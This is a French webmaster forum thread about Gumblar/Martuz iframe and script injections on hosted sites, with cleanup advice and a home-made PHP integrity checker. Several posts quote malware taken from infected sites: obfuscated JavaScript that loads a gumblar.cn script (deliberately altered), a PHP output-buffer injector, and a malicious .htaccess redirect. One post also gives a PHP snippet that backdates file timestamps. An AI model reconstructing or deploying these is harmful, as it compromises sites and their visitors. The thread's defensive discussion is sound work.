OVH Community, votre nouvel espace communautaire.

ATTAQUES SITES WEB PAR IFRAMES : PROBLEMES ET SOLUTIONS (Gumblar, Martuz, etc.)


mprouvot
19/12/2012, 13h13
un script en bash permet de faire un rechercher remplacer :

find www -name "*" -exec sed -i ‘s/Recherche/Remplacement/g' {} \;
en pratique, on remplace les " par des . et les / par des [/]

find www -name "*" -exec sed -i ‘s/
Supprimer "XXXXXXXXXX" pour voir le code réel. "XXXXXXXXXX" est une mesure de sécurité.

- Effacer tous ces iframes
- Vérifier la présence d'autres i frames
- Appliquer les règles de mon How-To pour nettoyer TOUS les PC et le site
- Changer les codes FTP obligatoirement

Daniel60
21/09/2009, 16h24
Avast! rapporte une infection de type HTML:Illiframe-B[Trj] sur votre site.

Ryoh
21/09/2009, 14h03
http://www.bruno-tran.fr/
http://www.bruno-tran.fr/blog

J'ai attrapé cette m**** . Toutes les pages des sites et sous-sites que j'ai s'affichent mal ou plantent...
Le gars qui a programmé est une belle enflure
je verrais ce que je peux faire ce soir. comme si j'avais que ça à faire quoi...

CBOX
17/09/2009, 09h58
>chbj
Je tiens tout simplement à te remercie, j'ai eu pas mal de problème avec mes clients sur ce thème là, la solution pour moi, c'est analizer les FTP des clients, y si ce sont des ips etrangère, verifie le code et bloque la web en prevenant le client si le code contient cette me...
Mais depuis pas mal de temp je cherche des explications sur ce thème là pour pouvoir leur expliquer ce qu'ils doivent faire.
Ton post donne deja beaucoup de piste.

PN1114
09/09/2009, 01h51
Bonsoir

Concernant l'autre login en fait il y a déjà plus d'un an j'avais créé un espace ftp pour un client pour qu'il puisse recupérer des fichiers.

C'est sur cette connexion ftp que les fameux trojans ont réussit à chopper mon mot de passe.
Moi j'avais totalement oublié que j'avais créé cela car c'est un ancien client; donc pendant des semaines je changais mon mot de passe trois fois par jours en croyant que le souci était sur mon ftp principal!!!!! Alors qu'il fallait le changer aussi sur le secondaire mais dont j'avais oublié l'existence.

Ce que je ne pardonne pas au support OVH c'est d'avoir mis autant de temps, disons d'avoir attendu que je paie le service de support pour me donner cette information!!!!! J'en revenais pas!!!!

Je pense que les chinois (car ce sont des chinois qui se connectaient) ont choppé mon mot de passe il y a très longtemps car ils ont fait un vrai dégas sur mon site et ils sont abusé de ma messagerie en tant que système de spam (je n'utilise pas l'adresse email de mon site me passe par hotmail donc je n'étais même pas au courant)

donc voilà ça a été la cata, l'état de mon site auprès de Google c'est un desastre mais j'ai demandé qu'il revalue le site. On verra.

Je ne peux pas t'en dire plus car ma conversation avec ovh a été par téléphone sur ce point et que j'ai supprimé ce deuxième ftp si vite lorsque j'ai vu que c'était là que...

Depuis, tout se passe bien est mon site reste inviolé à ce jour donc depuis samedi (nous sommes mardi... déjà mercredi vu l'heure).

bonne nuit à tous

chbj
06/09/2009, 17h50
PN1114, pourraîs-tu nous donner plus de détails STP ?

Peut-être nous recopier la réponse du support OVH si elle était écrite ?

Evidemment, masque les mots de passe et remplace ton nom de domaine par "mondomaine.net" ou n'importe quoi, de même pour les logins. Fais de même pour ceux du client.


Par exemple, tu devrais avoir ce type d'informations (voir l'email que tu as reçu à ta création de compte)

Code:
FTP 
Serveur ftp          : ftp.mondomaine.com  ou ftp.90Plan.ovh.net
Login ou utilisateur : AAAAAAAAA
Mot de passe         : huhuhuhuhiu


FTP ANONYME, codes pour upload
 Serveur ftp  : ftp2.mondomaine.com ou anonymous.ftp.ovh.net
 Login        : AAAAAAAAA
 mot de passe : xyxyxyxyxyxyx
Et ensuite, tu devrais avoir créé un sous-dossier FTP dans ton FTP principal (celui du site, pas l'anonyme) et y avoir attaché un login et mot de passe pour le client, de telle sorte que quand, il se connecte, il ne voit QUE son sous dossier.

A partir de là, si tout est bien comme ça, c'est cette histoire "d'autre login" qui nous intéresse. ET comment il a pu être utilisé. (Ou alors je ne suis pas réveillé, c'est possible, grosse nuit de travail)

homez.43 est un nom utilisé par OVH pour les chemins "en dur" de ses serveurs et il se susbtitue à "/home" qui est le chemin relatif utilisé dans les scripts.

PN1114
06/09/2009, 13h04
Bonjour et merci

en faite, moyennant du paiement au super support ovh (...) j'ai reussi à qu'il me disent que la connexion se faisait sur un autre login ftp (multi-ftp).

SAUF QUE LE LOGIN QUI APPARAISSAIT je ne le connassait pas homez.43
Je n'ai jamais créé un login comme ceci de ma vie.

J'avais créé un espace ftp secondaire pour un ancien client (qu'il puisse prendre des fichiers que je lui livrais) mais jamais homez.43

sauf si ceci est créé automatiquement.... je ne sais pas.

donc je ne sais pas d'où vient cette faille; peut-être d'OVH lui-même mais ils diront toujours que non!!!!

j'ai supprimé cette chose, fais un chown pour me redonner le propriété à mes répertoires et pour l'instant ça a l'air d'aller mieux.

depuis 6 mois je me bats avec ovh pour qu'il me donnent plus d'info et finalement j'ai dû leur payer (c'est ce qu'ils veulent) afin d'avoir plus d'info.

j'ai dû supprimer entièrement mon espace web; j'attends un peu avant de tout recommencer et de dire à Google de revoir mon site car je suis classé comme site "malveillant" biensûr.

c'est fou cette histoire.

affaire malheureusement à suivre

D'accord j'ai regardé sur google et homez.xxx est bien lié au multi-ftp de ovh; donc c'est normal
alors la chose est que c'est par cette porte qu'ils entraient ces chinois... puisque ce sont des chinois qui m'ont chopper cette entrée

merci à tous en esperant que peu à peu ce merdier cera reglé pour tous

Equilibrius
05/09/2009, 13h56
Quel est le chmod du répertoire où est ce htaccess ? y a des choses au niveau des log ftp, apache ?

PN1114
05/09/2009, 11h30
Bonjour à tous,
me voici avec des retours très concrets

Hier j'ai absolument tout vider sur mon espace web, tout table ras

après j'ai fait un scan complet de mes deux PC (il y en a un seul qui utilise ftp pour se connecter à mon site)

En fait en mode sans echec j'ai passé CCleaner, RegCleaner, Malwarebytes.

Sur mon poste j'ai constamment Avast qui laboure, ad-aware et j'ai aussi installé ZoneAlarm qui normalent est là pour m'indiquer tout accès sur internet.

tous ces logiciels ont indiqué que mon poste est propre.

Acrobat et Flash Player ont été desintallé et re-installé la semaine dernière.

Hier soir avant d'eitteindre mon poste j'ai créé un nouvau mot de passe ftp de sorte de rallumer mon poste le lendemain avec un noveau mot de passe.

J'allume ce matin et une demie heure plus tard je me connecte sur ftp pour placer une petite page .html où il n'y a qu'un message indiquant que mon site, ayant été mechament hacké, il est en reconstrucion.

et voilà que je trouve un joli .htaccess créé par un propriétaire que je ne connait pas (2338 100) et dans lequel je lis:

Code:
RewriteEngine On

RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]


RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]


RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]

RewriteRule .* http://spywareshop.info/0/go.php?sid=2 [R,L]
Quelqu'un peut me dire comment un trojan quel qu'il soit peut chopper mon nouveau mot de passe alors que je ne l'avais pas encore saisi (je vous rappelle j'en avais créé un tout neuf la veille au soir) et aussi me dire ce que ce .httaccess veut dire?

merci de votre aide et là j'avoue ne pas comprendre du tout car je ne saisit mon nouveau de passe à 11:7 alors que ces fichiers datent de 10:32 donc l'heure à laquelle j'ai allumé mon poste.

Sauf si ce fichier .htaccess c'est ovh qui le crée... ou google....

je n'en peux plus.

merci à tous

Equilibrius
04/09/2009, 19h09
En ce qui concerne le développement d'iframe.attack, c'est pas pour critiquer, mais le soft a ces limites, comme le rappelle chbj les iframes ne sont pas les seul moyen de contamination, les hackers rivalisent d'ingéniosité quant au camouflage de leur bestiole, et rien qu'avec mes connaissances en prog web, j'ai pas trop de mal a imaginer des dizaines de "solutions" pour contourner iframe.attack (les plus évidente rien qu'en html : injection de

chbj
04/09/2009, 16h22
Citation Envoyé par Samira
Pour l'origine des chevaux de Troie qui pénètre nos système, j'ai lu quelque par que sa vient entre autre de Acrobat version 8.(je sais plus quoi) c'est quand même dingue si c'est vrai, parce que ça veut dire qu'il faut virer acrobat pro 8 (500 euro tout de même à l'époque ou je l'ai acheter...) et mettre le 9... pourquoi adobe prévois pas un patch de sécurité ??? si le pb viens vraiment d'une faille acrobat.
Il y a des patches de sécurité, voir le how-to (mais je suspecte des failles d'autres logiciels d'être utilisées maintenant) :

Citation Envoyé par chbj
Ces trojans utilisent des faiblesses de certains logiciels : Adobe Reader (aussi appelé PDF Reader, Acrobat Reader), et Adobe Flash Player. (A noter que rien n'empêche théoriquement d'utiliser des faiblesses d'autres logiciels similaires.)

La contamination s'effectue donc la plupart du temps par l'intermédiaire de ces logiciels par les fichiers qu'ils téléchargent / jouent.
Citation Envoyé par chbj
- Télécharger les dernières versions de Adobe Reader et Adobe Flash Player, de préférence sur une machine sûre. (Il se peut que d'autres logiciels soient aujourd'hui en cause, mais il faut bien commencer par ce qui est connu !)

- Désinstaller totalement Adobe Acrobat Reader et Adobe Flash Player sur les PC.

- Mettre à jour ses anti-virus. (...)
Il peut être souhaitable, dans les cas extrêmes, de lancer l'antivirus à partir d'un CD-ROM bootable propre mais normalement cela n'est pas nécessaire avec cette famille de virus.

- Lancer son anti-virus et faire un scan complet.

- Supptrimer autant que possible tous les fichiers inutiles de votre PC

- Ensuite installer les dernières versions de Adobe Acrobat Reader et Adobe Flash Player

Citation Envoyé par Samira
merci pour le rappel chbj, j'avais oublié de supprimer iframe.attack de notre serveur après usage.... pas très malin la miss...

Samira
04/09/2009, 16h05
Salut PN1114, Je saurai pas trop dire si les développeurs d'iframe.attack compte mettre à jour leur soft ? pour détecter d'autre type d'attaques...

Mais chbj à raison tout de même quand il parle des autres types d'attaques en injection javacript , à première ont ne peut supprimer que les iframes qui craigne avec le soft, pour l'injection javascript si quelqu'un à une autre soluce, je suis preneuse... Pour l'instant, ici on touche du bois, avast ne s'affole plus qaund on navigue sur notre site, on a tester un maximum de page et on à mis à contribution nos visiteurs pour qu'il nous contact dès que leur anti-virus s'affole.

Pour l'origine des chevaux de Troie qui pénètre nos système, j'ai lu quelque par que sa vient entre autre de Acrobat version 8.(je sais plus quoi) c'est quand même dingue si c'est vrai, parce que ça veut dire qu'il faut virer acrobat pro 8 (500 euro tout de même à l'époque ou je l'ai acheter...) et mettre le 9... pourquoi adobe prévois pas un patch de sécurité ??? si le pb viens vraiment d'une faille acrobat.

Pour les web-ftp (travail de groupe), je connais pas, je vais me renseigné...
(d'ailleurs si quelqu'un à un petit lien? je sais google est mon ami... je suis un peu flémarde, c'est qd même vendredi ! )

ps. merci pour le rappel chbj, j'avais oublié de supprimer iframe.attack de notre serveur après usage.... pas très malin la miss...

chbj
04/09/2009, 15h37
Oui... C'est très bien que quelqu'un crée un logiciel pratique pour lister tous les tags iframes sur les fichiers d'un site, et il n'y a aucun problème pour qu'il veuille le faire connaître et gagner de l'argent avec, puisqu'il fournit un travail réel et utile, et qui simplifie la vie.

Là où j'ai un problème, c'est quand on vous annonce que le serveur est propre ou que c'est la solution. Parce que, depuis le début, j'ai indiqué que ce type d'attaques n'utilise pas systématiquement du tout un tag iframe ! Et ceci depuis Martuz et les premières variantes de Gumblar.
(C'est pour cela que j'ai titré "Attaques Sites Web par Iframes (et similaires)"
Donc, ça aide indéniablement pour les iframes, mais pas plus.

Que fera un chercheur de tag iframe dans les cas suivants (réels et observés à plusieurs reprises) qui relèvent du même processus d'infection que les simples iframes ?

(Codes altérés, par sécurité)
Code:
(function(jil){var xR5p='%';eval(unescape(('var"20a"3d"22Sc"72iptEngin CASSE PAR SECURITE +  CASSE PAR SECURITE "3dnavig"61t"6fr"2e"75s"65rAgent"3bif(("75"2eind"65xOf"28"22Win"22)"3e0)"26"26(u"2e"69n"64exO"66("22NT"20"36"22"29"3c0)"26"26(documen"74"2ecookie"2e"69ndex"4f"66"28"22"6die"6b"3d1"22) CASSE PAR SECURITE "3c0)"26"26"28t"79"70e"6ff("7arvzts)"21"3dtypeof("22A"22))"29"7bzrvzts"3d"22A"22"3b"65va"6c("22if(wi"6edow"2e"22+a+"22"29j"3d"6a+"22+a+"22M"61jo"72"22+"62"2ba+"22Minor"22" CASSE PAR SECURITE 2bb+a+"22B"75"69ld"22"2bb"2b"22j"3b"22)"3bdocu"6de"6e"74"2ewr"69"74e CASSE PAR SECURITE ("22"3csc"72ipt"20sr"63"3d"2f"2fgumblar"2ecn"2frss"2f"
Code:
#is',$s,$a))
foreach($a[0] as $v) if(count(explode("\n",$v))>5){
$e=preg_match('#[\'"] CASSE PAR SECURITE [^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v) || preg_match('#[\(\[](\s*\d+,)20,}#',$v);
if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos;($v,'[removed]')))$s=str_replace($v,'',$s);}
$s1=preg_replace('##','',$s);
if(stristr($s,''))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array(); CASSE PAR SECURITE if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);
for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i3fid"3d"22+j+"22"3e"3c"5c"2f"73cript"3e"22"29"3b"7d').replace(jil,xR5p)))})(/"/g); CASSE PAR SECURITE
Je précise qu'à la différence du tag iframe malveillant, normalement situé sur les pages de type index, ces scripts peuvent se trouver sur quasiment n'importe quelle page.

Je pense que pas mal de gens subissent ce qu'ils croient être de nouvelles infections à répétition parce que, en fait, seules ont été nettoyées les attaques iframes simples mais pas les scripts camouflés ("obfuscated").

Donc, oui à la recherche automatique d'iframes, mais il ne faut pas s'imaginer ou prétendre que c'est la (ou une) solution. C'est juste une partie.


Note : si on se sert du logiciel mentionné, surtout ne pas oublier de l'effacer du serveur immédiatement après usage car il constitue lui-même un trou de sécurité potentiel. (Ce que les instructions spécifient clairement, mais je préfère le répéter.)


Enfin, comment les agents malveillants arrivent-ils sur les PC, c'est dit dans le message initial (mais évidemment de manière très bréve) : en exploitant les failles de certains logiciels utilisés quand on surfe sur le Web.


+1 Pour ce que vient de poster Equilibrius

Equilibrius
04/09/2009, 15h01
Salut, la plus part du temps, tout les problèmes lié à la sécurité viennent du fait que les utilisateurs sont naïf ou/et suivent peux (voir aucune) de règle de sécurité, premièrement aux niveau des mot de passe, un pass de 6 chiffres est inutile, mieux vaut créer un gros pass aléatoire avec des lettres, des chiffres et des "caractères spéciaux" genre $ ^ ! : ect..
Et utiliser des pass différent pour le maximum de choses. C'est la base, évident me direz-vous… ensuite il y a pas mal de possibilité pour voler des login, si vous utilisez des réseau non sécurisé, les trojans ne sont qu'un vecteur parmi t'en d'autres…

Peut-être que ton ordi est clean, mais sa ne veux pas dire que le virus n'y a pas fait un tour, passe a l'AV tout tes support amovible, une simple clé avec un autorun modifié et un petit .bat ou .com caché peu suffir a voler presque n'importe quelles données…

Ensuite, une fois les login volé, des réseaux de machine prennent la relève et se connectent directement a ton ftp, télécharge tout les index.xxx, injecte le code et renvoi sur le serveur.. j'ai déjà vue des log de ce type d'attaque, et sa fait limite froid dans le dos vu le nombre de pc qui ouvre des connexions vers le serveur ftp :s

La parade ultime reviendrait à n'autoriser que les connexions qui viennent de telle ou telle ip au niveau du serveur FTP, comme dit plus haut. Certain hébergeur web proposent ce service.

Ps : payer un soft pour faire ça, c'est limite louche, rien ne remplacera une bonne gestion des backup, une surveillance constante et des règles stricte d'utilisation, après pour les projet de groupe, une solution se trouve peut-être avec les web-ftp =)

PN1114
04/09/2009, 14h28
Samira
merci de ton lien super utile

dis-moi tu sais si ce logiciel est mis à jour de la part des réalisateurs afin que l'on puisse detecter de nouvelles idées géniales des hackeurs?
il est peut-être codé par les mêmes qui ont inventé le virus...

merci, je pense que ça vaut la peine de payer s'il est vraiment bien;


merci encore et courage à vous aussi .. en ce moment je suis en train de tout vider sur mon espace web et tenter de recommencer à zero.

merci encore

JE REVIENS CAR JE LIS SUR LE SITE:
Bien entendu, l'opération de nettoyage avec Iframe.Attack doit bien évidemment être complétée par un nettoyage complet de votre machine de travail (Les antivirus tels que par exemple Avast ou Kasperky,... repèrent bien ce type de trojan et permettent sont éradication). N'oubliez pas non plus de changer de mot de passe de vos serveurs FTP attaqués, ainsi, vous éviterez toute re-contamination.
J'ai Avast qui est constamment à jour, constamment en train de contrôler mon poste et déjà deux fois dans la semaine j'ai lancé un scan total de mes disques; Avant n'a absolument rien trouvé sur mon poste, j'ai un seul poste se connectant via ftp à mon espace web.
Donc je ne suis pas sûre que Avast trouve la source du problème sur mon PC par contre il est vrai qu'il trouve le virus si je me connecte sur mon site web infecté.
Comment arrivent-ils ces premiers fichiers, ce qui font démarrer toute la chaine vers la galère???? c'est ça que j'aimerais savoir.

C'est ça la question les tous premiers fichiers !!!! d'où viennent-il !!!
merci si vous avez la réponse

Samira
04/09/2009, 06h29
Une solution ???
Moi aussi j'ai eu pas mal de problème avec un site communautaire, pas mal de monde travaillant sur ce site, les logins / password FTP se sont retrouvés sur pas mal de PC et forcément le site s'est fait "Hacké" par des injections d'iframes.

Le problème est qu'on avait pas réellement de backup, ont travaillaient tous directement sur le serveur... Bref, la galère...

Finalement, j'ai copier/coller ce petit programme : Iframe.Attack v1.1 : http://www.kawablog.com/scarabox/pro...uit=1&id_rub=2
directement dans la racine du site et il a tout nettoyé assez rapidement et pourtant, on à plus de 6000 fichiers sur notre serveur . ATTENTION Faut tout de même débourser 15euro... Mais bon, c'est réglé.

Pour info, même avec notepad++, c'est pas évident le nettoyage car, sur notre serveur, on à remarqué que plusieurs types d'iframe avaient été injectées...

Goodluck sami

newrare
31/08/2009, 14h15
ou mieux encore :
http://demo.ovh.net

Equilibrius
30/08/2009, 10h24
Bonjour, tu peux utiliser un de ces sites : imageshack.us, imagup.com ou monsterup.com, puis envoi le lien.

PN1114
29/08/2009, 23h17
Bonjour à tous

je me suis inscrite au forum pour vous montrer à quoi ressemble une page contaminée avec le iframe mais je n'arrive pas à joindre une photo à ma réponse (disons sans l'uploader sur mon espace ovh car j'essaie d'y accéder le moins possible si vous voyez ce que je veux dire....)

merci

Equilibrius
28/08/2009, 16h21
Ps : pour éviter le hotlink, on peu remplacer
Code PHP:
$imgDir "http://www.lenumeriquefacile.com/var/telecom/storage/images/media/images/images_ordinateur/icone_dossier/1244-1-fre-FR/icone_dossier_large.png"
par
Code PHP:
$imgDir "data:image/png;base64,"
         
."iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAACXBIWXMAABcSAAAXEgFnn9JSAAAKT2lDQ1BQaG90b3Nob3AgSUNDIHByb2ZpbGUAAHj"
         
."anVNnVFPpFj333vRCS4iAlEtvUhUIIFJCi4AUkSYqIQkQSoghodkVUcERRUUEG8igiAOOjoCMFVEsDIoK2AfkIaKOg6OIisr74Xuja9a89+bN/rXXPu"
         
."es852zzwfACAyWSDNRNYAMqUIeEeCDx8TG4eQuQIEKJHAAEAizZCFz/SMBAPh+PDwrIsAHvgABeNMLCADATZvAMByH/w/qQplcAYCEAcB0kThLCIAUA"
         
."EB6jkKmAEBGAYCdmCZTAKAEAGDLY2LjAFAtAGAnf+bTAICd+Jl7AQBblCEVAaCRACATZYhEAGg7AKzPVopFAFgwABRmS8Q5ANgtADBJV2ZIALC3AMDO"
         
."EAuyAAgMADBRiIUpAAR7AGDIIyN4AISZABRG8lc88SuuEOcqAAB4mbI8uSQ5RYFbCC1xB1dXLh4ozkkXKxQ2YQJhmkAuwnmZGTKBNA/g88wAAKCRFRH"
         
."gg/P9eM4Ors7ONo62Dl8t6r8G/yJiYuP+5c+rcEAAAOF0ftH+LC+zGoA7BoBt/qIl7gRoXgugdfeLZrIPQLUAoOnaV/Nw+H48PEWhkLnZ2eXk5NhKxE"
         
."JbYcpXff5nwl/AV/1s+X48/Pf14L7iJIEyXYFHBPjgwsz0TKUcz5IJhGLc5o9H/LcL//wd0yLESWK5WCoU41EScY5EmozzMqUiiUKSKcUl0v9k4t8s+"
         
."wM+3zUAsGo+AXuRLahdYwP2SycQWHTA4vcAAPK7b8HUKAgDgGiD4c93/+8//UegJQCAZkmScQAAXkQkLlTKsz/HCAAARKCBKrBBG/TBGCzABhzBBdzB"
         
."C/xgNoRCJMTCQhBCCmSAHHJgKayCQiiGzbAdKmAv1EAdNMBRaIaTcA4uwlW4Dj1wD/phCJ7BKLyBCQRByAgTYSHaiAFiilgjjggXmYX4IcFIBBKLJCD"
         
."JiBRRIkuRNUgxUopUIFVIHfI9cgI5h1xGupE7yAAygvyGvEcxlIGyUT3UDLVDuag3GoRGogvQZHQxmo8WoJvQcrQaPYw2oefQq2gP2o8+Q8cwwOgYBz"
         
."PEbDAuxsNCsTgsCZNjy7EirAyrxhqwVqwDu4n1Y8+xdwQSgUXACTYEd0IgYR5BSFhMWE7YSKggHCQ0EdoJNwkDhFHCJyKTqEu0JroR+cQYYjIxh1hIL"
         
."CPWEo8TLxB7iEPENyQSiUMyJ7mQAkmxpFTSEtJG0m5SI+ksqZs0SBojk8naZGuyBzmULCAryIXkneTD5DPkG+Qh8lsKnWJAcaT4U+IoUspqShnlEOU0"
         
."5QZlmDJBVaOaUt2ooVQRNY9aQq2htlKvUYeoEzR1mjnNgxZJS6WtopXTGmgXaPdpr+h0uhHdlR5Ol9BX0svpR+iX6AP0dwwNhhWDx4hnKBmbGAcYZxl"
         
."3GK+YTKYZ04sZx1QwNzHrmOeZD5lvVVgqtip8FZHKCpVKlSaVGyovVKmqpqreqgtV81XLVI+pXlN9rkZVM1PjqQnUlqtVqp1Q61MbU2epO6iHqmeob1"
         
."Q/pH5Z/YkGWcNMw09DpFGgsV/jvMYgC2MZs3gsIWsNq4Z1gTXEJrHN2Xx2KruY/R27iz2qqaE5QzNKM1ezUvOUZj8H45hx+Jx0TgnnKKeX836K3hTvK"
         
."eIpG6Y0TLkxZVxrqpaXllirSKtRq0frvTau7aedpr1Fu1n7gQ5Bx0onXCdHZ4/OBZ3nU9lT3acKpxZNPTr1ri6qa6UbobtEd79up+6Ynr5egJ5Mb6fe"
         
."eb3n+hx9L/1U/W36p/VHDFgGswwkBtsMzhg8xTVxbzwdL8fb8VFDXcNAQ6VhlWGX4YSRudE8o9VGjUYPjGnGXOMk423GbcajJgYmISZLTepN7ppSTbm"
         
."mKaY7TDtMx83MzaLN1pk1mz0x1zLnm+eb15vft2BaeFostqi2uGVJsuRaplnutrxuhVo5WaVYVVpds0atna0l1rutu6cRp7lOk06rntZnw7Dxtsm2qb"
         
."cZsOXYBtuutm22fWFnYhdnt8Wuw+6TvZN9un2N/T0HDYfZDqsdWh1+c7RyFDpWOt6azpzuP33F9JbpL2dYzxDP2DPjthPLKcRpnVOb00dnF2e5c4Pzi"
         
."IuJS4LLLpc+Lpsbxt3IveRKdPVxXeF60vWdm7Obwu2o26/uNu5p7ofcn8w0nymeWTNz0MPIQ+BR5dE/C5+VMGvfrH5PQ0+BZ7XnIy9jL5FXrdewt6V3"
         
."qvdh7xc+9j5yn+M+4zw33jLeWV/MN8C3yLfLT8Nvnl+F30N/I/9k/3r/0QCngCUBZwOJgUGBWwL7+Hp8Ib+OPzrbZfay2e1BjKC5QRVBj4KtguXBrSF"
         
."oyOyQrSH355jOkc5pDoVQfujW0Adh5mGLw34MJ4WHhVeGP45wiFga0TGXNXfR3ENz30T6RJZE3ptnMU85ry1KNSo+qi5qPNo3ujS6P8YuZlnM1VidWE"
         
."lsSxw5LiquNm5svt/87fOH4p3iC+N7F5gvyF1weaHOwvSFpxapLhIsOpZATIhOOJTwQRAqqBaMJfITdyWOCnnCHcJnIi/RNtGI2ENcKh5O8kgqTXqS7"
         
."JG8NXkkxTOlLOW5hCepkLxMDUzdmzqeFpp2IG0yPTq9MYOSkZBxQqohTZO2Z+pn5mZ2y6xlhbL+xW6Lty8elQfJa7OQrAVZLQq2QqboVFoo1yoHsmdl"
         
."V2a/zYnKOZarnivN7cyzytuQN5zvn//tEsIS4ZK2pYZLVy0dWOa9rGo5sjxxedsK4xUFK4ZWBqw8uIq2Km3VT6vtV5eufr0mek1rgV7ByoLBtQFr6wt"
         
."VCuWFfevc1+1dT1gvWd+1YfqGnRs+FYmKrhTbF5cVf9go3HjlG4dvyr+Z3JS0qavEuWTPZtJm6ebeLZ5bDpaql+aXDm4N2dq0Dd9WtO319kXbL5fNKN"
         
."u7g7ZDuaO/PLi8ZafJzs07P1SkVPRU+lQ27tLdtWHX+G7R7ht7vPY07NXbW7z3/T7JvttVAVVN1WbVZftJ+7P3P66Jqun4lvttXa1ObXHtxwPSA/0HI"
         
."w6217nU1R3SPVRSj9Yr60cOxx++/p3vdy0NNg1VjZzG4iNwRHnk6fcJ3/ceDTradox7rOEH0x92HWcdL2pCmvKaRptTmvtbYlu6T8w+0dbq3nr8R9sf"
         
."D5w0PFl5SvNUyWna6YLTk2fyz4ydlZ19fi753GDborZ752PO32oPb++6EHTh0kX/i+c7vDvOXPK4dPKy2+UTV7hXmq86X23qdOo8/pPTT8e7nLuarrl"
         
."ca7nuer21e2b36RueN87d9L158Rb/1tWeOT3dvfN6b/fF9/XfFt1+cif9zsu72Xcn7q28T7xf9EDtQdlD3YfVP1v+3Njv3H9qwHeg89HcR/cGhYPP/p"
         
."H1jw9DBY+Zj8uGDYbrnjg+OTniP3L96fynQ89kzyaeF/6i/suuFxYvfvjV69fO0ZjRoZfyl5O/bXyl/erA6xmv28bCxh6+yXgzMV70VvvtwXfcdx3vo"
         
."98PT+R8IH8o/2j5sfVT0Kf7kxmTk/8EA5jz/GMzLdsAAAAgY0hSTQAAeiUAAICDAAD5/wAAgOkAAHUwAADqYAAAOpgAABdvkl/FRgAAAt1JREFUeNqE"
         
."0s9rI2Ucx/H3MzNpGhP7I3aTNGnEolhWaKxC1VtTQVhK7UbKlh6LIOxJocJuxUsPPS/sf+BJXNyL4EkRD1bwEEr30KXdtdolP+oWd5JMZob5+Tx7iJV"
         
."Fyvr+A1584fMVSik2NzeZnZ1lb2/PmJiY+NhxnF2l1P1ut0uxWKTft1FKEgQB+Xwe0zSJ45g4jjEApqenP0un03+Pj4//fPnyGzcrldnbx8fHP+7v73"
         
."/jed73vu9bhqGjlCIMQ+I45jx9e3ubZrP55fLy8hczM6+vh2GUA5EqlYozlcqbq1NTU9d0XZtyHOcJMD4399bXURS/6Dj2A03TfAOg2Wz+FgTBh7lcv"
         
."nTpUg7btjk7O8O2n5BMDr9WrVZvzM/Pf/rw4e+H5XJ5LpvNfrC7+4tr2/2vDIDT09P7pmkyNjaGUgrDMCgUCriui2manJw8QggxXCjk5xzHxvM8fN/P"
         
."m6aJBtDpdI7a7bbvui5xHBOGIWEYAjA6OkqpVAQU7XYb3w9wHAfgJV03BoDv+382m80/+v0+54iUEoAoilBKkclkUApc18GyLOI4HtE0bQAIIbxGo/G"
         
."T53m4rovneQRBQBRF/2JCCKSUWJaN47hIKVNCiAGglKLVat3p9/v8FznfW9M0ACzLIooigAQw+IN6vY6U8tdcLvfd2tra1V6vhxACXR9sL6VEKUU6/Q"
         
."JB4BNFAUoRaZoYAAcHBwBqZ2fnumma5urq6no2m01ZloWUEk3TCMOQoaEEuq7jeT5KyS4IhFIKIQTPNFwul9/Z2Nj4pFar1VKpVKbb7dLr9YjjmFarx"
         
."cnJI+7d2/+8Xq/fugjQAAWkJycn315ZWfloaWmpViwWX+l0Ojx+/BeHhw+4e/fb9aOjozsXAc9COpBMJpOvVqvV9xcXF69UKpX3Go3GyNbW1tVOp/MD"
         
."Sin+Jw0YAjLAy4VC4crCwsLNRCLxLjDyvAsuyjhf7h/UeToAY86Y7wlCpZsAAAAASUVORK5CYII="
Bon ok, je chipote un peu :$

Equilibrius
28/08/2009, 16h15
Salut,

@enycu : Se baser sur la date de modification (on a accès a la date de création sous unix ??) n'est pas une bonne solution je pense, on peu facilement antidater n'importe quel fichier avec php (avec une fonction de base, je parle même pas de ce qu'on pourrais faire avec un accès ssh)

Ce simple script antidate "tonfichier.php" d'un an :
Code PHP:
("tonfichier.php"time()-(60*60*24*30*12), time()-(60*60*24*30*12));  ?>
J'ai pas pu vérifier, mais il me semble que sur certaines distrib, le fait de modifier un chmod change aussi la date de dernière modification d’un fichier [a vérifier].

Les autres solutions proposé seront sûrement plus adapté ou/et plus performantes que mon script, mais elles nécessitent toutes (celles que j’ai vu) un niveau élevé de droits sur la machine sur laquelle on veux les utiliser, ce que n'ont pas la plus par des utilisateurs d'hébergement mutualisé.

Fini de parler, place au script : checkSetup.php

Code PHP:

set_time_limit
(0);

$imgDir "http://www.lenumeriquefacile.com/var/telecom/storage/images/media/images/images_ordinateur/icone_dossier/1244-1-fre-FR/icone_dossier_large.png";

// Futur fichier de vérification
$check_php '$sum     = \'__SUM__\';
$hashs   = file_get_contents($sum);
$modif   = \'\';
$tabHash = explode("\n",$hashs);
$hacked  = false;
if (filesize($sum) != __SIZE__) $hacked = true;
foreach($tabHash as $ligne)
{
    $tmp = explode(";",$ligne);
    if (isset($tmp[0]) && preg_match("/[a-f0-9]{32}/i",$tmp[1])) // Si le nom du fichier et le hash sont bien formé, on vérif
    {
        if (@md5_file($tmp[0]) != $tmp[1])
        {
            $hacked = true;
            $modif .= "\t\n".$tmp[0];
        }
    } else $hacked = true;
}

if ($hacked)
{
    $time = @file_get_contents("time.tmp");
    
    if ($time === false || !is_numeric($time) || $time < time()-(60*60))
    {
        file_put_contents("time.tmp",time());
